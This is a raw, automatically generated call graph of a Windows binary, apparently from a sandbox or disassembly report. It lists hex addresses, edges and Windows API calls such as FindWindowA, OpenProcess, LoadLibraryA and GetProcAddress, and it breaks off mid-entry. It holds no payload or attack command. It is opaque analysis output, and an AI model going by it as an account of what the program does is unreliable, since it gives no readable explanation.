11145bc0 268 API calls 104797->104813 104799 11061200 104825 110610f0 104799->104825 104804 11081e7d 104803->104804 104805 11081e82 104803->104805 104866 11081c50 IsDBCSLeadByte 104804->104866 104806 11081e8b 104805->104806 104812 11081e9f 104805->104812 104867 1116558e 85 API calls 3 library calls 104806->104867 104809 11081e98 104809->104766 104810 11081f03 104810->104766 104811 11166654 85 API calls std::locale::_Init 104811->104812 104812->104810 104812->104811 104813->104773 104814->104776 104815->104778 104818 110608f4 104817->104818 104824 1106092c 104817->104824 104819 110608f8 104818->104819 104818->104824 104828 110606d0 104819->104828 104820 11060992 104820->104799 104824->104820 104833 11060470 67 API calls 2 library calls 104824->104833 104835 110609a0 104825->104835 104829 1106070e 104828->104829 104831 110606e3 std::ios_base::_Ios_base_dtor 104828->104831 104829->104799 104830 110606d0 66 API calls 104830->104831 104831->104829 104831->104830 104834 1105fea0 66 API calls 2 library calls 104831->104834 104833->104824 104834->104831 104836 110609df 104835->104836 104842 11060a24 104835->104842 104866->104805 104867->104809 104868->104345 104870 11124fd1 InitializeCriticalSection 104869->104870 104872 11124ffe GetCurrentThreadId 104870->104872 104874 11125035 104872->104874 104875 1112503c 104872->104875 104959 1110fff0 InterlockedIncrement 104874->104959 104917 11160b10 InterlockedIncrement 104875->104917 104878 11125051 104915->104354 104918 11160b27 104917->104918 104919 11160b22 104917->104919 104921 11160b4c SelectPalette SelectPalette 104918->104921 104922 11160b38 104918->104922 104992 11160a60 271 API calls std::locale::_Init 104919->104992 104994 11160750 265 API calls 104921->104994 104993 11029a70 265 API calls 2 library calls 104922->104993 104926 11160b73 104995 11160750 265 API calls 104926->104995 104928 11160b80 104929 11160b93 104928->104929 104930 11160c4e 104928->104930 104996 111606e0 265 API calls 2 library calls 104929->104996 105007 11160750 265 API calls 104930->105007 104933 11160b9e 104936 11160bc3 104933->104936 104937 11160bad GetSystemPaletteEntries 104933->104937 104934 11160c5b 104935 11160c61 DeleteDC 104934->104935 104935->104878 104938 11160be6 104936->104938 104939 11160bcf 104936->104939 104937->104938 104959->104875 104992->104918 104994->104926 104995->104928 104996->104933 105007->104934 106018->104404 106019->104409 106020 11116880 106038 11145ef0 106020->106038 106023 111168c5 106024 111168a8 106023->106024 106025 111168d4 CoInitialize CoCreateInstance 106023->106025 106026 11162bb7 __87except 5 API calls 106024->106026 106028 11116904 LoadLibraryA 106025->106028 106037 111168f9 106025->106037 106029 111168b6 106026->106029 106027 11145c70 std::locale::_Init 90 API calls 106027->106023 106030 11116920 GetProcAddress 106028->106030 106028->106037 106033 11116930 SHGetSettings 106030->106033 106034 11116944 FreeLibrary 106030->106034 106031 111169e1 CoUninitialize 106032 111169e7 106031->106032 106035 11162bb7 __87except 5 API calls 106032->106035 106033->106034 106034->106037 106036 111169f6 106035->106036 106037->106031 106037->106032 106039 11145c70 std::locale::_Init 90 API calls 106038->106039 106040 1111689e 106039->106040 106040->106023 106040->106024 106040->106027 106041 1102ebd0 106042 1102ec13 106041->106042 106043 111101b0 std::locale::_Init 265 API calls 106042->106043 106044 1102ec1a 106043->106044 106046 1102ec3a 106044->106046 107102 11143630 106044->107102 106047 11143780 86 API calls 106046->106047 106048 1102ec64 106047->106048 106049 1102ec91 106048->106049 106050 11081e70 86 API calls 106048->106050 106052 11143780 86 API calls 106049->106052 106051 1102ec76 106050->106051 106054 11081e70 86 API calls 106051->106054 106053 1102ecba 106052->106053 106055 11163ca7 std::locale::_Init 79 API calls 106053->106055 106057 1102ecc7 106053->106057 106054->106049 106055->106057 106056 1102ed4f GetSystemMetrics 106058 1102ed5e 106056->106058 106062 1102ed68 106056->106062 106061 11145c70 std::locale::_Init 90 API calls 106057->106061 106065 1102ecf6 106057->106065 106059 11147060 std::locale::_Init 21 API calls 106058->106059 106059->106062 106060 1102ed82 CreateEventA 106063 1102ed95 106060->106063 106064 1102eda9 106060->106064 106061->106065 106062->106060 107110 11029a70 265 API calls 2 library calls 106063->107110 106067 111101b0 std::locale::_Init 265 API calls 106064->106067 106065->106056 106065->106062 106068 1102edb0 106067->106068 106069 1102edd0 106068->106069 106070 11110de0 426 API calls 106068->106070 106071 111101b0 std::locale::_Init 265 API calls 106069->106071 106070->106069 106072 1102ede4 106071->106072 106073 11110de0 426 API calls 106072->106073 106074 1102ee04 106072->106074 106073->106074 106075 111101b0 std::locale::_Init 265 API calls 106074->106075 106076 1102ee83 106075->106076 106077 1102eeb3 106076->106077 106078 11061aa0 301 API calls 106076->106078 106079 111101b0 std::locale::_Init 265 API calls 106077->106079 106078->106077 106080 1102eecd 106079->106080 106081 1102eef2 FindWindowA 106080->106081 106082 11061710 293 API calls 106080->106082 106084 1102f032 106081->106084 106085 1102ef2b 106081->106085 106082->106081 106086 11061ef0 268 API calls 106084->106086 106085->106084 106089 1102ef43 GetWindowThreadProcessId 106085->106089 106087 1102f044 106086->106087 106088 11061ef0 268 API calls 106087->106088 106090 1102f050 106088->106090 106091 11147060 std::locale::_Init 21 API calls 106089->106091 106093 11061ef0 268 API calls 106090->106093 106092 1102ef60 OpenProcess 106091->106092 106092->106084 106094 1102ef7d 106092->106094 106095 1102f05c 106093->106095 107111 11094f00 105 API calls 106094->107111 106097 1102f073 106095->106097 106098 1102f06a 106095->106098 106465 111464e0 106097->106465 107112 11028360 119 API calls 2 library calls 106098->107112 106099 1102ef9c 106101 11147060 std::locale::_Init 21 API calls 106099->106101 106104 1102efb0 106101->106104 106102 1102f06f 106102->106097 106106 1102efef CloseHandle FindWindowA 106104->106106 106109 11147060 std::locale::_Init 21 API calls 106104->106109 106105 1102f082 106107 1102f086 106105->106107 106480 1102a6d0 IsJPIK 106105->106480 106110 1102f022 106106->106110 106111 1102f014 GetWindowThreadProcessId 106106->106111 106496 11145990 ExpandEnvironmentStringsA 106107->106496 106113 1102efc2 SendMessageA WaitForSingleObject 106109->106113 106114 11147060 std::locale::_Init 21 API calls 106110->106114 106111->106110 106113->106106 106117 1102efe2 106113->106117 106115 1102f02f 106114->106115 106115->106084 106119 11147060 std::locale::_Init 21 API calls 106117->106119 106121 1102efec 106119->106121 106120 1102f0b5 106122 1102f177 106120->106122 106520 11063880 106120->106520 106121->106106 106535 11027b20 106122->106535 106126 110b7df0 std::locale::_Init 9 API calls 106129 1102f19c std::locale::_Init 106139 1102f1b7 106129->106139 106555 1102ad70 106129->106555 106558 110287a0 106139->106558 107180 111457a0 106465->107180 106468 111457a0 std::locale::_Init 265 API calls 106469 11146517 wsprintfA 106468->106469 106470 11143e00 std::locale::_Init 8 API calls 106469->106470 106472 11146534 106470->106472 106471 11146560 106473 11162bb7 __87except 5 API calls 106471->106473 106472->106471 106474 11143e00 std::locale::_Init 8 API calls 106472->106474 106475 1114656c 106473->106475 106476 11146549 106474->106476 106475->106105 106476->106471 106477 11146550 106476->106477 106478 11162bb7 __87except 5 API calls 106477->106478 106479 1114655c 106478->106479 106479->106105 106481 1102a705 106480->106481 106482 1102a7d3 106480->106482 106483 111101b0 std::locale::_Init 265 API calls 106481->106483 106482->106107 106484 1102a70c 106483->106484 106485 1102a73b 106484->106485 106486 11061aa0 301 API calls 106484->106486 106487 11063880 330 API calls 106485->106487 106486->106485 106488 1102a759 106487->106488 106488->106482 106489 110d1930 268 API calls 106488->106489 106491 1102a765 106489->106491 106490 1102a7c7 106492 110d0a10 265 API calls 106490->106492 106491->106490 106493 1102a798 106491->106493 106492->106482 106494 110d0a10 265 API calls 106493->106494 106495 1102a7a4 106494->106495 106495->106107 106497 111459c7 106496->106497 106498 111459d4 106497->106498 106499 111459e4 std::locale::_Init 106497->106499 106500 111459fe 106497->106500 106502 11142e60 std::locale::_Init 265 API calls 106498->106502 106503 111459f5 GetModuleFileNameA 106499->106503 106501 111457a0 std::locale::_Init 265 API calls 106500->106501 106504 11145a04 106501->106504 106505 11145a58 106502->106505 106503->106504 106506 11081e00 std::locale::_Init IsDBCSLeadByte 106504->106506 106507 11162bb7 __87except 5 API calls 106505->106507 106506->106498 106508 1102f0a3 106507->106508 106509 11143e00 106508->106509 106510 11143e21 CreateFileA 106509->106510 106512 11143ebe CloseHandle 106510->106512 106513 11143e9e 106510->106513 106516 11162bb7 __87except 5 API calls 106512->106516 106514 11143ea2 CreateFileA 106513->106514 106515 11143edb 106513->106515 106514->106512 106514->106515 106518 11162bb7 __87except 5 API calls 106515->106518 106517 11143ed7 106516->106517 106517->106120 106519 11143eea 106518->106519 106519->106120 106521 1105e820 79 API calls 106520->106521 106522 110638a8 106521->106522 107224 110627b0 106522->107224 106524 1102f0d6 106524->106122 106524->106126 106526 11063909 std::locale::_Init 106528 1105e820 79 API calls 106526->106528 106527 1105e950 5 API calls 106527->106526 106529 1106393d 106528->106529 106536 11061a70 274 API calls 106535->106536 106537 11027b54 106536->106537 106538 1105e820 79 API calls 106537->106538 106541 11027b69 106538->106541 106539 11027c38 106542 11027cec 106539->106542 106553 11081e70 86 API calls 106539->106553 106554 11145c70 std::locale::_Init 90 API calls 106539->106554 107624 11061e10 268 API calls 4 library calls 106539->107624 106540 11027bbf LoadIconA 106544 11027bd1 106540->106544 106545 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 106540->106545 106541->106539 106541->106540 106543 11145ef0 std::locale::_Init 90 API calls 106541->106543 106548 11162bb7 __87except 5 API calls 106542->106548 106549 11027ba2 LoadLibraryExA 106543->106549 106544->106545 106546 11027c13 106545->106546 106547 11027bff LoadIconA 106545->106547 106546->106539 106551 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 106546->106551 106547->106546 106552 11027cf9 106548->106552 106549->106540 106549->106547 106551->106539 106552->106129 106553->106539 106554->106539 107625 11028c10 106555->107625 106557 1102ad7e 106559 11147060 std::locale::_Init 21 API calls 106558->106559 106560 110287c6 106559->106560 106561 110288b4 106560->106561 106562 110287dd GetModuleFileNameA 106560->106562 107661 11013dd0 22 API calls 2 library calls 106561->107661 106564 11081e00 std::locale::_Init IsDBCSLeadByte 106562->106564 106566 11028801 106564->106566 106565 110288c7 107103 11143678 107102->107103 107106 1114363e 107102->107106 107104 11142e60 std::locale::_Init 265 API calls 107103->107104 107105 11143680 107104->107105 107105->106046 107106->107103 107107 11143662 107106->107107 108412 11142ee0 267 API calls std::locale::_Init 107107->108412 107109 11143668 107109->106046 107111->106099 107112->106102 107181 111457c2 107180->107181 107185 111457d9 std::locale::_Init 107180->107185 107222 11029a70 265 API calls 2 library calls 107181->107222 107184 11145967 107186 11162bb7 __87except 5 API calls 107184->107186 107185->107184 107187 1114580c GetModuleFileNameA 107185->107187 107188 11145983 wsprintfA 107186->107188 107189 11081e00 std::locale::_Init IsDBCSLeadByte 107187->107189 107188->106468 107190 11145821 107189->107190 107191 11145831 SHGetFolderPathA 107190->107191 107192 11145918 107190->107192 107194 1114585e 107191->107194 107195 1114587d SHGetFolderPathA 107191->107195 107193 11142e60 std::locale::_Init 262 API calls 107192->107193 107193->107184 107194->107195 107198 11145864 107194->107198 107197 111458b2 std::locale::_Init 107195->107197 107201 1102ad70 std::locale::_Init 145 API calls 107197->107201 107223 11029a70 265 API calls 2 library calls 107198->107223 107202 111458c3 107201->107202 107204 11145240 107202->107204 107205 111452ca 107204->107205 107206 1114524b 107204->107206 107205->107192 107206->107205 107207 1114525b GetFileAttributesA 107206->107207 107208 11145275 107207->107208 107209 11145267 107207->107209 107210 11164bb8 __strdup 66 API calls 107208->107210 107209->107192 107211 1114527c 107210->107211 107212 11081e00 std::locale::_Init IsDBCSLeadByte 107211->107212 107213 11145286 107212->107213 107214 111452a3 107213->107214 107215 11145240 std::locale::_Init 67 API calls 107213->107215 107214->107192 107216 11145296 107215->107216 107217 111452ac 107216->107217 107218 1114529e 107216->107218 107220 11163aa5 _free 66 API calls 107217->107220 107219 11163aa5 _free 66 API calls 107218->107219 107219->107214 107221 111452b1 CreateDirectoryA 107220->107221 107221->107214 107345 11145a70 107224->107345 107226 1106283c 107227 110d1930 268 API calls 107226->107227 107228 11062850 107227->107228 107230 11062a37 107228->107230 107279 11062864 std::ios_base::_Ios_base_dtor 107228->107279 107354 1116535d 107228->107354 107229 110637a8 107232 110d0a10 265 API calls 107229->107232 107233 1116535d _fgets 81 API calls 107230->107233 107231 11164c77 std::locale::_Init 102 API calls 107231->107229 107271 11062931 std::ios_base::_Ios_base_dtor 107232->107271 107235 11062a51 107233->107235 107239 11062a58 107235->107239 107243 11062ab7 _strpbrk 107235->107243 107236 110628e7 107237 110628ee 107236->107237 107251 1106293d _strpbrk std::locale::_Init 107236->107251 107238 11062923 107237->107238 107394 11164c77 107237->107394 107242 110d0a10 265 API calls 107238->107242 107240 11062a9d 107239->107240 107245 11164c77 std::locale::_Init 102 API calls 107239->107245 107246 110d0a10 265 API calls 107240->107246 107242->107271 107373 11164536 107243->107373 107244 11162bb7 __87except 5 API calls 107248 110637df 107244->107248 107245->107240 107246->107271 107248->106524 107248->106526 107248->106527 107252 11163ca7 std::locale::_Init 79 API calls 107251->107252 107253 110629ad 107252->107253 107271->107244 107279->107229 107279->107231 107347 11145a83 std::ios_base::_Ios_base_dtor 107345->107347 107346 11145990 267 API calls 107346->107347 107347->107346 107348 11164ead std::locale::_Init 143 API calls 107347->107348 107349 11145aea std::ios_base::_Ios_base_dtor 107347->107349 107350 11145aa5 GetLastError 107347->107350 107348->107347 107349->107226 107350->107347 107351 11145ab0 Sleep 107350->107351 107352 11164ead std::locale::_Init 143 API calls 107351->107352 107353 11145ac2 107352->107353 107353->107347 107353->107349 107355 11165369 __CRT_INIT@12 107354->107355 107356 1116537c 107355->107356 107357 111653ad 107355->107357 107461 1116a1af 66 API calls __getptd_noexit 107356->107461 107363 1116538c __CRT_INIT@12 107357->107363 107435 1116be59 107357->107435 107359 11165381 107462 1116edc4 11 API calls __mbsnbicmp_l 107359->107462 107363->107236 107365 1116545e 107367 11165431 107367->107365 107441 11172885 107367->107441 107374 1116454f 107373->107374 107375 111642e0 strtoxl 79 API calls 107374->107375 107376 11062ae1 107375->107376 107395 11164c83 __CRT_INIT@12 107394->107395 107396 11164c95 107395->107396 107397 11164caa 107395->107397 107436 1116be8d EnterCriticalSection 107435->107436 107437 1116be6b 107435->107437 107439 111653bb 107436->107439 107437->107436 107438 1116be73 107437->107438 107440 1117459f __lock 66 API calls 107438->107440 107439->107367 107463 1116a147 107439->107463 107440->107439 107461->107359 107462->107363 107464 1116a153 107463->107464 107465 1116a168 107463->107465 107624->106539 107626 11028c33 107625->107626 107627 1102927b 107625->107627 107628 11028cf0 GetModuleFileNameA 107626->107628 107638 11028c68 107626->107638 107629 11029317 107627->107629 107630 1102932a 107627->107630 107631 11028d11 _strrchr 107628->107631 107632 11162bb7 __87except 5 API calls 107629->107632 107633 11162bb7 __87except 5 API calls 107630->107633 107634 11164ead std::locale::_Init 143 API calls 107631->107634 107635 11029326 107632->107635 107636 1102933b 107633->107636 107637 11028ceb 107634->107637 107635->106557 107636->106557 107637->107627 107655 11026ef0 81 API calls 2 library calls 107637->107655 107640 11164ead std::locale::_Init 143 API calls 107638->107640 107640->107637 107661->106565 108412->107109 108427 110262f0 108428 110262fe GetProcAddress 108427->108428 108429 1102630f 108427->108429 108428->108429 108430 11026328 108429->108430 108431 1102631c K32GetProcessImageFileNameA 108429->108431 108433 1102632e GetProcAddress 108430->108433 108434 1102633f 108430->108434 108431->108430 108432 11026361 108431->108432 108433->108434 108435 11026346 108434->108435 108436 11026357 SetLastError 108434->108436 108436->108432 108437 1113d980 108438 1113d989 108437->108438 108439 1113d98e 108437->108439 108441 11139ed0 108438->108441 108442 11139f12 108441->108442 108443 11139f07 GetCurrentThreadId 108441->108443 108444 11139f20 108442->108444 108575 11029950 108442->108575 108443->108442 108582 11134830 108444->108582 108450 1113a011 108456 1113a042 FindWindowA 108450->108456 108460 1113a0da 108450->108460 108451 1113a59a 108452 11162bb7 __87except 5 API calls 108451->108452 108454 1113a5b2 108452->108454 108454->108439 108455 11139f5c IsWindow IsWindowVisible 108458 11147060 std::locale::_Init 21 API calls 108455->108458 108457 1113a057 IsWindowVisible 108456->108457 108456->108460 108459 1113a05e 108457->108459 108457->108460 108461 11139f87 108458->108461 108459->108460 108464 11139a70 392 API calls 108459->108464 108462 1105e820 79 API calls 108460->108462 108470 1113a0ff 108460->108470 108463 1105e820 79 API calls 108461->108463 108482 1113a127 108462->108482 108466 11139fa3 IsWindowVisible 108463->108466 108468 1113a07f IsWindowVisible 108464->108468 108465 1105e820 79 API calls 108471 1113a29f 108465->108471 108466->108450 108472 11139fb1 108466->108472 108467 11139a70 392 API calls 108474 1113a2ca 108467->108474 108468->108460 108475 1113a08e IsIconic 108468->108475 108469 1113a2e7 108819 1112ddd0 12 API calls 2 library calls 108469->108819 108470->108465 108478 1113a2b0 108470->108478 108471->108478 108479 1113a2a4 108471->108479 108472->108450 108473 11139fb9 108472->108473 108480 11147060 std::locale::_Init 21 API calls 108473->108480 108474->108469 108818 1106c340 298 API calls 108474->108818 108475->108460 108481 1113a09f GetForegroundWindow 108475->108481 108478->108467 108478->108474 108817 1102d750 294 API calls std::locale::_Init 108479->108817 108485 11139fc3 GetForegroundWindow 108480->108485 108815 11132120 147 API calls 108481->108815 108482->108470 108487 1113a174 108482->108487 108494 11081d30 IsDBCSLeadByte 108482->108494 108483 1113a2ec 108488 1113a2f4 108483->108488 108489 1113a2fd 108483->108489 108491 11139fd2 EnableWindow 108485->108491 108492 11139ffe 108485->108492 108496 11143e00 std::locale::_Init 8 API calls 108487->108496 108820 11132a10 89 API calls 3 library calls 108488->108820 108497 1113a314 108489->108497 108498 1113a308 108489->108498 108490 1113a2ab 108490->108478 108813 11132120 147 API calls 108491->108813 108492->108450 108510 1113a00a SetForegroundWindow 108492->108510 108493 1113a0ae 108816 11132120 147 API calls 108493->108816 108494->108487 108503 1113a186 108496->108503 108822 111326b0 299 API calls std::locale::_Init 108497->108822 108504 1113a319 108498->108504 108821 11132780 299 API calls std::locale::_Init 108498->108821 108502 1113a2fa 108502->108489 108505 1113a193 GetLastError 108503->108505 108523 1113a1a1 108503->108523 108508 1113a312 108504->108508 108509 1113a429 108504->108509 108512 11147060 std::locale::_Init 21 API calls 108505->108512 108507 11139fe9 108814 11132120 147 API calls 108507->108814 108508->108504 108514 1113a331 108508->108514 108515 1113a3db 108508->108515 108516 11139600 295 API calls 108509->108516 108510->108450 108511 1113a0b5 108517 1113a0cb EnableWindow 108511->108517 108519 1113a0c4 SetForegroundWindow 108511->108519 108512->108523 108514->108509 108525 111101b0 std::locale::_Init 265 API calls 108514->108525 108515->108509 108830 1103f920 68 API calls 108515->108830 108534 1113a42e 108516->108534 108517->108460 108518 11139ff0 EnableWindow 108518->108492 108519->108517 108520 1113a455 108531 1105e820 79 API calls 108520->108531 108574 1113a57a std::ios_base::_Ios_base_dtor 108520->108574 108522 1113a3ea 108831 1103f960 68 API calls 108522->108831 108523->108470 108524 1113a1f2 108523->108524 108527 11081d30 IsDBCSLeadByte 108523->108527 108529 11143e00 std::locale::_Init 8 API calls 108524->108529 108528 1113a352 108525->108528 108527->108524 108532 1113a373 108528->108532 108823 11057eb0 306 API calls std::locale::_Init 108528->108823 108533 1113a204 108529->108533 108530 1113a3f5 108832 1103f980 68 API calls 108530->108832 108548 1113a485 108531->108548 108824 1110fff0 InterlockedIncrement 108532->108824 108533->108470 108538 1113a20b GetLastError 108533->108538 108534->108520 108729 11142d90 108534->108729 108541 11147060 std::locale::_Init 21 API calls 108538->108541 108540 1113a400 108833 1103f940 68 API calls 108540->108833 108541->108470 108542 1113a398 108825 1104d790 446 API calls 108542->108825 108545 1113a40b 108834 11110000 InterlockedDecrement 108545->108834 108546 1113a3a3 108826 1104ecd0 446 API calls 108546->108826 108549 1113a4cd 108548->108549 108552 1113a4aa 108548->108552 108553 1113a4d9 GetTickCount 108548->108553 108548->108574 108549->108553 108549->108574 108551 1113a3d9 108551->108509 108555 11147060 std::locale::_Init 21 API calls 108552->108555 108556 1113a4eb 108553->108556 108553->108574 108554 1113a3ae 108827 1104ed40 446 API calls 108554->108827 108559 1113a4b5 GetTickCount 108555->108559 108557 11143a50 145 API calls 108556->108557 108560 1113a4f7 108557->108560 108559->108574 108562 11147af0 269 API calls 108560->108562 108561 1113a3b9 108828 1104d7d0 446 API calls 108561->108828 108564 1113a502 108562->108564 108566 11143a50 145 API calls 108564->108566 108565 1113a3c4 108565->108509 108829 110ec320 285 API calls 108565->108829 108567 1113a515 108566->108567 108835 110261a0 LoadLibraryA 108567->108835 108570 1113a522 108570->108570 108836 1112d6e0 GetProcAddress SetLastError 108570->108836 108572 1113a569 108573 1113a573 FreeLibrary 108572->108573 108572->108574 108573->108574 108574->108451 108837 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 108575->108837 108577 11029973 108839 11089fe0 269 API calls 2 library calls 108577->108839 108580 1102997e 108580->108444 108581 1102995e 108581->108577 108838 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 108581->108838 108583 11134872 108582->108583 108584 11134b94 108582->108584 108585 1105e820 79 API calls 108583->108585 108586 11162bb7 __87except 5 API calls 108584->108586 108587 11134892 108585->108587 108588 11134bac 108586->108588 108587->108584 108589 1113489a GetLocalTime 108587->108589 108630 11134310 108588->108630 108590 111348d1 LoadLibraryA 108589->108590 108591 111348b0 108589->108591 108840 11009940 LoadLibraryA 108590->108840 108592 11147060 std::locale::_Init 21 API calls 108591->108592 108594 111348c5 108592->108594 108594->108590 108595 11134925 108841 110161e0 LoadLibraryA 108595->108841 108597 11134930 GetCurrentProcess 108598 11134955 GetProcAddress 108597->108598 108599 1113496d GetProcessHandleCount 108597->108599 108598->108599 108600 11134976 SetLastError 108598->108600 108601 1113497e 108599->108601 108600->108601 108602 111349a2 108601->108602 108603 11134988 GetProcAddress 108601->108603 108605 111349b0 GetProcAddress 108602->108605 108607 111349ca 108602->108607 108603->108602 108604 111349d7 SetLastError 108603->108604 108604->108605 108606 111349e4 SetLastError 108605->108606 108605->108607 108608 111349ef GetProcAddress 108606->108608 108607->108608 108609 11134a01 K32GetProcessMemoryInfo 108608->108609 108610 11134a0f SetLastError 108608->108610 108611 11134a17 108609->108611 108610->108611 108612 11147060 std::locale::_Init 21 API calls 108611->108612 108616 11134a8d 108611->108616 108612->108616 108613 11134b6a 108614 11134b7a FreeLibrary 108613->108614 108615 11134b7d 108613->108615 108614->108615 108617 11134b87 FreeLibrary 108615->108617 108618 11134b8a 108615->108618 108616->108613 108620 1105e820 79 API calls 108616->108620 108617->108618 108618->108584 108619 11134b91 FreeLibrary 108618->108619 108619->108584 108621 11134ade 108620->108621 108622 1105e820 79 API calls 108621->108622 108623 11134b06 108622->108623 108624 1105e820 79 API calls 108623->108624 108625 11134b2d 108624->108625 108626 1105e820 79 API calls 108625->108626 108627 11134b54 108626->108627 108627->108613 108628 11134b65 108627->108628 108842 11027de0 265 API calls 2 library calls 108628->108842 108632 1113433d 108630->108632 108631 111347f9 108631->108450 108631->108451 108733 11139a70 108631->108733 108632->108631 108633 110d1930 268 API calls 108632->108633 108634 1113439e 108633->108634 108635 110d1930 268 API calls 108634->108635 108636 111343a9 108635->108636 108637 111343d7 108636->108637 108638 111343ee 108636->108638 108843 11029a70 265 API calls 2 library calls 108637->108843 108640 11147060 std::locale::_Init 21 API calls 108638->108640 108642 111343fc 108640->108642 108844 110d1530 265 API calls 108642->108844 108730 11142daf 108729->108730 108731 11142d9a 108729->108731 108730->108520 108845 11142400 108731->108845 108734 11139eaf 108733->108734 108737 11139a8d 108733->108737 108735 11162bb7 __87except 5 API calls 108734->108735 108736 11139ebe 108735->108736 108736->108455 108737->108734 108738 11145c70 std::locale::_Init 90 API calls 108737->108738 108739 11139acc 108738->108739 108739->108734 108740 1105e820 79 API calls 108739->108740 108741 11139afb 108740->108741 108977 1112d860 108741->108977 108743 11139c40 PostMessageA 108745 11139c55 108743->108745 108744 1105e820 79 API calls 108747 11139c3c 108744->108747 108746 11139c65 108745->108746 108986 11110000 InterlockedDecrement 108745->108986 108749 11139c6b 108746->108749 108750 11139c8d 108746->108750 108747->108743 108747->108745 108752 11139cc3 std::ios_base::_Ios_base_dtor 108749->108752 108753 11139cde 108749->108753 108987 11131320 315 API calls std::locale::_Init 108750->108987 108760 11162bb7 __87except 5 API calls 108752->108760 108755 11143a50 145 API calls 108753->108755 108754 11139c95 108988 11147ad0 267 API calls 108754->108988 108758 11139ce3 108755->108758 108761 11147af0 269 API calls 108758->108761 108759 11139c9f 108989 1112da60 SetDlgItemTextA 108759->108989 108763 11139cda 108760->108763 108764 11139cea SetWindowTextA 108761->108764 108763->108455 108766 11139d06 108764->108766 108772 11139d0d std::ios_base::_Ios_base_dtor 108764->108772 108765 11139cb0 std::ios_base::_Ios_base_dtor 108765->108749 108990 111361c0 299 API calls 5 library calls 108766->108990 108767 11146710 271 API calls 108769 11139beb 108767->108769 108769->108743 108769->108744 108770 11139d64 108773 11139d78 108770->108773 108774 11139e3c 108770->108774 108771 11139d37 108771->108770 108777 11139d4c 108771->108777 108772->108770 108772->108771 108991 111361c0 299 API calls 5 library calls 108772->108991 108778 11139d9c 108773->108778 108993 111361c0 299 API calls 5 library calls 108773->108993 108776 11139e5d 108774->108776 108780 11139e4b 108774->108780 108781 11139e44 108774->108781 108999 110f8b70 86 API calls 108776->108999 108992 11132120 147 API calls 108777->108992 108995 110f8b70 86 API calls 108778->108995 108998 11132120 147 API calls 108780->108998 108997 111361c0 299 API calls 5 library calls 108781->108997 108784 11139e68 108784->108734 108790 11139e6c IsWindowVisible 108784->108790 108786 11139da7 108786->108734 108792 11139daf IsWindowVisible 108786->108792 108788 11139d5c 108788->108770 108790->108734 108794 11139e7e IsWindowVisible 108790->108794 108791 11139d86 108791->108778 108795 11139d92 108791->108795 108792->108734 108796 11139dc6 108792->108796 108793 11139e5a 108793->108776 108794->108734 108797 11139e8b EnableWindow 108794->108797 108994 11132120 147 API calls 108795->108994 108799 11145c70 std::locale::_Init 90 API calls 108796->108799 109000 11132120 147 API calls 108797->109000 108802 11139dd1 108799->108802 108801 11139d99 108801->108778 108802->108734 108804 11139ddc GetForegroundWindow IsWindowVisible 108802->108804 108803 11139ea2 EnableWindow 108803->108734 108805 11139e01 108804->108805 108806 11139df6 EnableWindow 108804->108806 108996 11132120 147 API calls 108805->108996 108806->108805 108808 11139e08 108809 11139e1e EnableWindow 108808->108809 108810 11139e17 SetForegroundWindow 108808->108810 108811 11162bb7 __87except 5 API calls 108809->108811 108810->108809 108812 11139e38 108811->108812 108812->108455 108813->108507 108814->108518 108815->108493 108816->108511 108817->108490 108818->108469 108819->108483 108820->108502 108821->108508 108822->108504 108823->108532 108824->108542 108825->108546 108826->108554 108827->108561 108828->108565 108829->108551 108830->108522 108831->108530 108832->108540 108833->108545 108834->108551 108835->108570 108836->108572 108837->108581 108838->108581 108839->108580 108840->108595 108841->108597 108842->108613 108846 1114243f 108845->108846 108898 11142438 std::ios_base::_Ios_base_dtor 108845->108898 108847 111101b0 std::locale::_Init 265 API calls 108846->108847 108849 11142446 108847->108849 108848 11162bb7 __87except 5 API calls 108850 11142d8a 108848->108850 108851 11142476 108849->108851 108852 11061aa0 301 API calls 108849->108852 108850->108730 108853 11062220 275 API calls 108851->108853 108852->108851 108854 111424b2 108853->108854 108855 111424b9 RegCloseKey 108854->108855 108856 111424c0 std::locale::_Init 108854->108856 108855->108856 108857 111424cf 108856->108857 108858 1102a6d0 354 API calls 108856->108858 108859 11145990 267 API calls 108857->108859 108858->108857 108860 111424ec 108859->108860 108861 11143e00 std::locale::_Init 8 API calls 108860->108861 108862 11142500 108861->108862 108863 11142517 108862->108863 108864 11063880 330 API calls 108862->108864 108865 111101b0 std::locale::_Init 265 API calls 108863->108865 108864->108863 108866 1114251e 108865->108866 108867 1114253a 108866->108867 108868 11061710 293 API calls 108866->108868 108869 111101b0 std::locale::_Init 265 API calls 108867->108869 108868->108867 108870 11142553 108869->108870 108871 1114256f 108870->108871 108872 11061710 293 API calls 108870->108872 108873 111101b0 std::locale::_Init 265 API calls 108871->108873 108872->108871 108874 11142588 108873->108874 108875 111425a4 108874->108875 108876 11061710 293 API calls 108874->108876 108877 11061290 268 API calls 108875->108877 108876->108875 108878 111425cd 108877->108878 108879 11061290 268 API calls 108878->108879 108916 111425e7 108879->108916 108880 11142915 108881 110d1930 268 API calls 108880->108881 108886 11142cf9 108880->108886 108883 11142933 108881->108883 108882 11061320 274 API calls 108882->108916 108887 1105e820 79 API calls 108883->108887 108884 11142905 108885 11147060 std::locale::_Init 21 API calls 108884->108885 108885->108880 108890 11061170 69 API calls 108886->108890 108889 11142970 108887->108889 108888 11147060 21 API calls std::locale::_Init 108888->108916 108892 11142abd 108889->108892 108894 11061290 268 API calls 108889->108894 108891 11142d52 108890->108891 108895 11061170 69 API calls 108891->108895 108893 11061a70 274 API calls 108892->108893 108896 11142ad9 108893->108896 108899 1114298e 108894->108899 108895->108898 108972 110684e0 298 API calls std::locale::_Init 108896->108972 108897 11132900 86 API calls 108897->108916 108898->108848 108900 11061320 274 API calls 108899->108900 108906 1114299d 108900->108906 108902 111429d2 108904 11061290 268 API calls 108902->108904 108903 11147060 std::locale::_Init 21 API calls 108903->108906 108908 111429e8 108904->108908 108905 11142b03 108907 11142b33 EnterCriticalSection 108905->108907 108918 11142b07 108905->108918 108906->108902 108906->108903 108910 11061320 274 API calls 108906->108910 108909 11060f50 271 API calls 108907->108909 108911 11061320 274 API calls 108908->108911 108912 11142b50 108909->108912 108910->108906 108935 111429f8 108911->108935 108915 11061a70 274 API calls 108912->108915 108914 11081e70 86 API calls 108914->108916 108920 11142b66 108915->108920 108916->108880 108916->108882 108916->108884 108916->108888 108916->108897 108916->108914 108924 11081f20 86 API calls std::locale::_Init 108916->108924 108917 11142a31 108919 